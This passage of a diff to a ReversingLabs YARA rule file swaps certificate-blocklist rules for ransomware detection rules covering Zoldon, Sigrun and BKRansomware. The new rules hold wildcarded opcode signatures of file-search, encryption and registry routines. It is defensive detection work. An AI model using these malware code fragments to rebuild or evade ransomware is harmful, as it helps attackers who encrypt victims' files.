+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Zoldon.yara#L1-L107"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4821b8506e7ba00987978f2744da1c532e03d73f3275cb15e39cdf87f6018223"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Zoldon"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$main_encrypt_function_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ??
+            ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ??
+            8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
+            64 89 20 E8 ?? ?? ?? ?? DD 5D ?? 9B 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? FF 75 ?? FF
+            75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? B2 ??
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B1 ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            3C ?? 0F 85 ?? ?? ?? ?? B0 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            84 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6
+            80 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 C7 45
+        }
+		$main_encrypt_function_p2 = {
+            8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 83 7D
+            ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 FF 45 ?? 66 83 7D
+            ?? ?? 75 ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 33 C9 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59
+            59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
+            E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$write_zoldon_regkey = {
+            55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 88 4D ?? 8B DA 8B F0 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 8D 45 ?? 8B D3 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D8 84 DB
+            75 ?? 8D 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 89 45 ?? 80 7D ??
+            ?? 74 ?? 83 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 46 ?? 50 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50
+            8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45 ?? EB
+            ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 8B 46 ?? 50 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 50 8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45
+            ?? 80 7D ?? ?? 74 ?? 83 7E ?? ?? 0F 95 C0 84 D8 74 ?? FF 76 ?? 68 ?? ?? ?? ?? FF 75
+            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33
+            C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ??
+            ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ??
+            89 45 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33
+            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45
+            ?? 80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ??
+            ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
+            68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B
+        }
+		$find_files_p2 = {
+            8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ??
+            ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D
+            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ??
+            ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D
+            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ??
+            ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, meicun ge" and pe.signatures [ i ] . serial == "4f:c1:3d:62:20:c6:29:04:3a:26:f8:1b:1c:ad:72:d8" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $write_zoldon_regkey ) and ( all of ( $find_files_p* ) ) and ( all of ( $main_encrypt_function_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3457A918C6D3701B2Eaca6A92474A7Cc : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sigrun : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sigrun ransomware."
 		author = "ReversingLabs"
-		id = "12526715-7b54-5c31-aa2a-b77ed067e3ee"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "fa627192-ed80-5115-a028-014f67f4571d"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1636-L1652"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "70d4bece52a86bfe8958f6d4195b833cea609596e3b68bb90087c262501bd462"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Sigrun.yara#L1-L111"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ea29ec64cdfc0c714fe0acdce5878cb1302dd5aa916811121c644948ce275935"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sigrun"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 83 7D ?? ?? 53 56 57 8B DA C7 44 24 ?? ?? ?? ??
+            ?? 8B F1 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 89 7C 24 ?? 85 C0 75 ?? 85 FF
+            75 ?? 5F 5E 5B 8B E5 5D C3 C7 44 24 ?? ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ??
+            A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ?? 89 44 24 ?? 0F B7 06 66 89 44 24 ?? 83 F8
+            ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56
+            FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF D7 8D
+            44 24 ?? 50 56 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75
+            ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 8D 44 24 ?? 50 56 FF D7 F6 44 24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ??
+            8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ??
+            ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF D7 6A ?? 8B D3 8B CE E8 ?? ?? ?? ?? EB ?? 53 8D 54
+            24 ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74
+            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E
+            33 C0 5B 8B E5 5D C3
+        }
+		$encrypt_files_1 = {
+            55 8B EC 83 EC ?? 53 57 68 ?? ?? ?? ?? 8B FA 8B D9 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 33 C0 5B 8B E5 5D C3
+            56 8D 45 ?? 33 F6 50 56 56 57 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ??
+            C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 68 ??
+            ?? ?? ?? 50 FF 75 ?? C7 00 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0
+            FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 5E 5F 5B 8B E5 5D C3
+        }
+		$encrypt_files_2 = {
+            55 8B EC 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B DA 8B F9 FF 15 ?? ??
+            ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CF E8 ?? ?? ?? ?? 85
+            C0 74 ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 5D C3 8B CF E8 ??
+            ?? ?? ?? 85 C0 75 ?? 83 7B ?? ?? 72 ?? 8B 55 ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 56
+            57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ??
+            5B 5D C3
+        }
+		$encrypt_files_3 = {
+            55 8B EC 83 EC ?? 56 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? 5F 5E 8B E5 5D C3 8D 45
+            ?? 50 8D 45 ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 8D 4D ?? 8B D7 E8
+            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 74 ??
+            C6 04 08 ?? 8B 4D ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75
+            ?? FF D6 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ??
+            57 FF D6 5F 33 C0 5E 8B E5 5D C3
+        }
+		$enum_resources_1 = {
+            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B F1 6A ?? 68 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 6A ?? 89 54 24 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF D7 8B 1D ?? ??
+            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 85 F6 0F 85 ?? ??
+            ?? ?? 8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF D3 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF
+            74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 49 ?? 33 DB 39 5C 24 ?? 0F 86
+            ?? ?? ?? ?? 8B 74 24 ?? 83 C6 ?? 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ?? ?? ?? ?? 57 FF
+            15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
+            6A ?? 57 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ??
+            8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8D 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF
+        }
+		$enum_resources_2 = {
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 74 24 ?? FF 74 24 ?? FF
+            15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF D3 8B F0 85 F6 0F 85 ?? ?? ??
+            ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ??
+            33 DB 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 83 C6 ?? 90 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ??
+            ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ?? 8D
+            4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8B 74
+            24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
+            50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 74 24
+            ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 8B
+            C6 5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KONSALTING PLUS OOO" and pe.signatures [ i ] . serial == "34:57:a9:18:c6:d3:70:1b:2e:ac:a6:a9:24:74:a7:cc" and 1432252799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_* ) ) and ( $find_files ) and ( all of ( $encrypt_files_* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_621Ed8265B0Ad872D9F4B4Ed6D560513 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bkransomware : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BKRansomware ransomware."
 		author = "ReversingLabs"
-		id = "b64e640c-264f-597c-90a5-d0ad57aa5075"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "88dc5c4a-046a-52e2-b108-0a90b91d4fb6"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1654-L1670"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c133d6eea5d27e597d0a656c7c930a5ca84adb46aa2fec66381b6b5c759e22aa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.BKRansomware.yara#L1-L79"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3118098f05a13bd161af0cb1ec322878b371ff70b9f3815a04115a214c0965a2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BKRansomware"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F9 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
+            57 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90
+            8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ??
+            8B B5 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B
+            10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66
+            85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83 C1 ?? 83 C0
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 83 FE ?? 74 ??
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
+            50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53
+            FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 57 6A ?? 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F9 68 ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 56 6A ?? 53 FF 15 ?? ?? ??
+            ?? 8B F0 68 ?? ?? ?? ?? 57 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ??
+            ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ??
+            57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
